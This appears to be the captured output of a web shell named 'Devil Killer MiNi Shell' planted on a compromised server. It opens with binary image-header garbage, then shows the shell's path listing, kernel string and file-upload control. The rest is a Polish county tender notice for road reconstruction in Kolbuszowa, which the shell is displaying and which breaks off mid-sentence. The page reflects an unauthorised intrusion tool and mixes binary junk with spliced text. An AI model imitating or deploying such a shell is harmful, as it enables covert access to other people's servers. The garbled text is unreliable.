JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/0026614401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i remont wybranych dróg powiatowych na terenie Powiatu Kolbuszowskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Kolbuszowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830443232</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11-go Listopada 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kolbuszowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@kolbuszowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/zdp_kolbuszowa</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> drogi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i remont wybranych dróg powiatowych na terenie Powiatu Kolbuszowskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7cc70d47-97b3-4ffa-9106-445cc341e715</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00266144</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00158784/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa/Rozbudowa wybranych dróg powiatowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdp_kolbuszowa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zdp_kolbuszowa</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy I Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>5. Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z „OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>6. Ofertę, oświadczenia o jakim mowa w Rozdziale X SWZ sporządza się w formie elektronicznej lub postaci elektronicznej, w ogólnie dostępnych formatach danych, w formatach: .txt, .rtf, .pdf, .doc, .docx, .odt, ze szczególnym wskazaniem na .pdf., podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w<br/>tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny wykonawca może złożyć bezpośrednio na dokumencie, który następnie przesyła do systemu (opcja rekomendowana przez platformazakupowa.pl) oraz dodatkowo dla całego pakietu dokumentów.<br/>7. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie formatu: .zip,<br/>8. Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar<br/>.gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>9. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB.<br/>10. Osobą uprawnioną do porozumiewania się z Wykonawcami jest: Lucyna Guściora, e-mail: zdp@kolbuszowski.pl<br/>11. W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania.<br/>13. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/pn/zdp_kolbuszowa. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/pn/zdp_kolbuszowa do konkretnego wykonawcy.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/zdp_kolbuszowa</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">10. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że:<br/>1) Administratorem danych osobowych osób fizycznych jest Zarząd Dróg Powiatowych w Kolbuszowej ul. 11 –go Listopada 10, 36 –100 Kolbuszowa , telefon kontaktowy: 177445774;<br/>2) Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować pocztą elektroniczną na adres: email: iod@kolbuszowski.pl;<br/>3) dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia 2016/679 w celu związanym z postępowaniem o udzielenie zamówienia publicznego - „Przebudowa i remont wybranych dróg powiatowych na terenie Powiatu Kolbuszowskiego” Oznaczenie sprawy: ZDP-2720.I.6.25<br/>4) w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 rozporządzenia 2016/679;<br/>5) osoba fizyczna posiada:<br/>a) na podstawie art. 15 rozporządzenia 2016/679 prawo dostępu do danych osobowych jej dotyczących;<br/>b) na podstawie art. 16 rozporządzenia 2016/679 prawo do sprostowania swoich danych osobowych;<br/>c) na podstawie art. 18 rozporządzenia 2016/679 prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679;\<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba fizyczna uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy rozporządzenia 2016/679;<br/>6) osobie fizycznej nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia 2016/679 prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679;<br/>c) na podstawie art. 21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust. 1 lit. c rozporządzenia 2016/679.<br/>11. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP-2720.I.6.25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1<br/><br/>1.	Przebudowa drogi powiatowej Nr 1 205 R relacji Wilcza Wola – Wola Raniżowska w km 7+590 – 8+450 w miejscowości Wola Raniżowska<br/><br/>Przedmiotowe przedsięwzięcie obejmuje zakresem: Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym wraz z geodezyjną inwentaryzacją powykonawczą; Wyrównanie istniejącej podbudowy mieszanką minerano-bitumiczną asfaltową mechaniczne - warstwa wyrówawcza AC16W o śr. gr 75kg/m2; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych <br/>o grubości 4 cm (warstwa ścieralna) AC11S; Wykonanie nawierzchni poboczy z kruszywa łamanego 0/31,5mm - warstwa o gr. 10 cm; Oczyszczenie rowów z wyprofilowaniem dna i skarp gr. 30 cm; Oczyszczenie części przelotowych istniejących przepustów fi 400 mm; Oczyszczenie części przelotowych istniejących przepustów fi 800 mm; Usunięcie z rowów korzeni i karpin pozostałych po wycince zakrzaczeń wraz z odwozem i utylizacją przez Wykonawcę. <br/><br/>2.	a) Przebudowa drogi powiatowej nr 1 218 R relacji Kolbuszowa Dolna – Kopcie w km 8+650 do km 9+626 w miejscowości Płazówka<br/><br/>Przedmiotowe przedsięwzięcie obejmuje zakresem: Roboty pomiarowe przy liniowych robotach ziemnych – trasa dróg w terenie równinnym wraz z geodezyjną inwentaryzacją powykonawczą; Rozebranie istniejącej konstrukcji jezdni o gr. 40cm – podbudowa z kruszywa oraz nawierzchnia z mas mineralno – bitumicznych; Roboty ziemne wykonywane koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat. III-IV z transp.urobku na odl. 1 km sam.samowyład. – projektowane poszerznia jezdni – obustronne 0,25m + nowa konstrukcja na przełomach 300m2; Wyrównanie istniejącej podbudowy mieszanką minerano-bitumiczną asfaltową AC16W o śr. gr 75kg/m2; Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 8 cm (warstwa wiążąca) AC16W; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) AC11S; Warstwa podbudowy z kruszywa łamanego stab. Mechanicznie 0/31,5mm gr. 20 cm; Wykonanie warstwy mrozoochronnej z gruntu stabilizowanego cementem klasa C1,5/2&lt;4,0Mpa gr. 15 cm; Wykonanie nawierzchni poboczy <br/>z kruszywa łamanego – warstwa o gr. 10 cm; Oczyszczenie rowów z wyprofilowaniem dna i skarp <br/>gr. 40 cm. <br/><br/>2.	b) Przebudowa drogi powiatowej nr 1 218 R relacji Kolbuszowa Dolna – Kopcie w km 9+626 do km 10+480 w miejscowości Płazówka<br/><br/>Przedmiotowe przedsięwzięcie obejmuje zakresem: Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym wraz z geodezyjną inwentaryzacją powykonawczą; Rozebranie istniejącej konstrukcji jezdni o gr. 40cm - podbudowa z kruszywa oraz nawierzchnia z mas mineralno – bitumicznych; Roboty ziemne wykonywane koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat. III-IV z transp.urobku na odl. 1 km sam.samowyład. - projektowane poszerznia jezdni - obustronne 0,25m + nowa konstrukcja na przełomach 300m2; Wyrównanie istniejącej podbudowy mieszanką minerano-bitumiczną asfaltową AC16W o śr. gr 75kg/m2; Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 8 cm (warstwa wiążąca) AC16W; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) AC11S; Warstwa podbudowy z kruszywa łamanego stab. mechanicznie 0/31,5mm gr. 20 cm; Wykonanie warstwy mrozoochronnej z gruntu stabilizowanego cementem klasa C1,5/2&lt;4,0MPa gr. 15 cm; Wykonanie nawierzchni poboczy <br/>z kruszywa łamanego - warstwa o gr. 10 cm; Oczyszczenie rowów z wyprofilowaniem dna i skarp <br/>gr. 40 cm. <br/><br/>3.	Przebudowa drogi powiatowej Nr 1 219 R relacji Lipnica – Poręby Dymarskie – Majdan Królewski w km 11+080 – 12+029 w miejscowości Komorów<br/> <br/>Przedmiotowe przedsięwzięcie obejmuje zakresem: Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym wraz z geodezyjną inwentaryzacją powykonawczą; Wyrównanie istniejącej podbudowy mieszanką minerano-bitumiczną asfaltową mechaniczne - warstwa wyrówawcza AC16W o śr. gr 75kg/m2; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych <br/>o grubości 4 cm (warstwa ścieralna) AC11S; Wykonanie nawierzchni poboczy z kruszywa łamanego 0/31,5mm - warstwa o gr. 10 cm; <br/><br/><br/>4.	Przebudowa drogi powiatowej nr 1223R relacji Ostrowy Tuszowskie – Trzęsówka - Siedlanka w km 0+950 – 1+949 w miejscowości Jagodnik<br/><br/>Przedmiotowe przedsięwzięcie obejmuje zakresem : Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym wraz z geodezyjną inwentaryzacją powykonawczą; Roboty ziemne wykonywane koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat. III-IV z transp.urobku na odl. 1 km sam.samowyład. - projektowane poszerznia jezdni - obustronne 0,25m; Wyrównanie istniejącej podbudowy mieszanką minerano-bitumiczną asfaltową AC16W o śr. gr 75kg/m2; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 8 cm (warstwa wiążąca) AC16W; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) AC11S; Wykonanie warstwy podbudowy z kruszywa łamanego stab. mechanicznie 0/31,5mm gr. 20 cm; Wykonania warstwy mrozoochronnej z gruntu stabilizowanego cementem klasa C1,5/2&lt;4,0MPa gr. 15 cm; Wykonanie nawierzchni poboczy z kruszywa łamanego - warstwa o gr. 10cm; Oczyszczenie rowów z wyprofilowaniem dna i skarp gr. 30 cm; Montaż pionowych znaków drogowych; Wykonanie oznakowania poziomego- cienkowarstwowego. <br/><br/>5.	Przebudowa drogi powiatowej nr 1225R relacji Kosowy – Niwiska – Kamionka - Sędziszów w km 6+970 – 7+969 w miejscowości Niwiska<br/><br/>Przedmiotowe przedsięwzięcie obejmuje zakresem : Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym wraz z geodezyjną inwentaryzacją powykonawczą; Roboty ziemne wykonywane koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat. III-IV z transp.urobku na odl. 1 km sam.samowyład. - projektowane poszerznia jezdni - obustronne 0,25m; Wyrównanie istniejącej podbudowy mieszanką minerano-bitumiczną asfaltową AC16W o śr. gr 75kg/m2; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 8 cm (warstwa wiążąca) AC16W; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) AC11S; Wykonanie warstwy podbudowy z kruszywa łamanego stab. mechanicznie 0/31,5mm gr. 20 cm; Wykonanie warstwy mrozoochronnej z gruntu stabilizowanego cementem klasa C1,5/2&lt;4,0MPa gr. 15 cm; Wykonanie nawierzchni poboczy z kruszywa łamanego 0/31,5mm o <br/>gr. 10 cm; Oczyszczenie rowów z wyprofilowaniem dna i skarp gr. 30 cm . <br/><br/>6.	Przebudowa zjazdu z drogi powiatowej nr 2150R relacji Kupno – Bratkowice w km 2+132 po lewej stronie drogi<br/><br/>Przedmiotowe przedsięwzięcie obejmuje zakresem : Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym wraz z geodezyjną inwentaryzacją powykonawczą; Rozebranie istniejącej konstrukcji jezdni o gr. 40cm - podbudowa z kruszywa oraz nawierzchnia z mas mineralno – bitumicznych; Roboty ziemne wykonywane koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat. III-IV z transp.urobku na odl. 1 km sam.samowyład. - projektowane poszerznia jezdni - obustronne 0,25m; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 8 cm (warstwa wiążąca) AC16W; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) AC11S; Wykonanie warstwy podbudowy z kruszywa łamanego stab. mechanicznie 0/31,5mm gr. 20 cm; Wykonanie warstwy mrozoochronnej z gruntu stabilizowanego cementem klasa C1,5/2&lt;4,0MPa gr. 15 cm; Wykonanie nawierzchni poboczy z kruszywa łamanego - warstwa o gr. 10 cm; Wykonanie przepustu rurowego PPØ400mm wraz ze ściankami czołowymi. <br/><br/>7.	Remont zjazdu z drogi powiatowej nr 1176R Tuszyma - Niwiska – Kolbuszowa (Obrońców Pokoju) w km 21+176 strona lewa wraz z remontem drogi wewnętrznej na działkach o nr ew.: 2328/8, 2328/9, 2328/11, 2328/12, 2328/13 Obręb 0001 Kolbuszowa<br/><br/>	Przedmiotowe przedsięwzięcie obejmuje zakresem: Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym wraz z geodezyjną inwentaryzacją powykonawczą; Wyrównanie istniejącej podbudowy mieszanką minerano-bitumiczną asfaltową mechaniczne - warstwa wyrówawcza AC16W o śr. gr 75kg/m2; Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) AC11S; Wykonanie nawierzchni poboczy z kruszywa łamanego 0/31,5mm - warstwa o gr. 10 cm; Wykonanie krawężników betonowych wystających o wymiarach <br/>15x30 cm z wykonaniem ław betonowych na podsypce cementowo – piaskowej; Regulacja wysokościowa wpustów deszczowych - 3 wpusty deszczowe, 9 studni kanalizacyjne.<br/><br/>Zakres robót zgodnie z kosztorysem ofertowym, dokumentacją projektową stanowiącą złącznik do SWZ oraz Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert I ich wagami (1% = 1 pkt):<br/>1) Cena I – 60 pkt,<br/>• Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>• Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>• Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona wg wzoru:<br/><br/>cena najniższa brutto*<br/>ilość punktów C = ------------------------------------------------ x 60 pkt<br/>cena oferty ocenianej brutto<br/><br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>Uwaga punktacja liczona oddzielnie dla każdej części<br/><br/>2) Gwarancja jakości (G) – 40 pkt,<br/>• Punkty za kryterium gwarancja jakości zostaną przyznane Wykonawcy na podstawie oświadczenia dotyczącego okresu udzielonej gwarancji jakości zawartego w formularzu oferty. Komisja dokona oceny 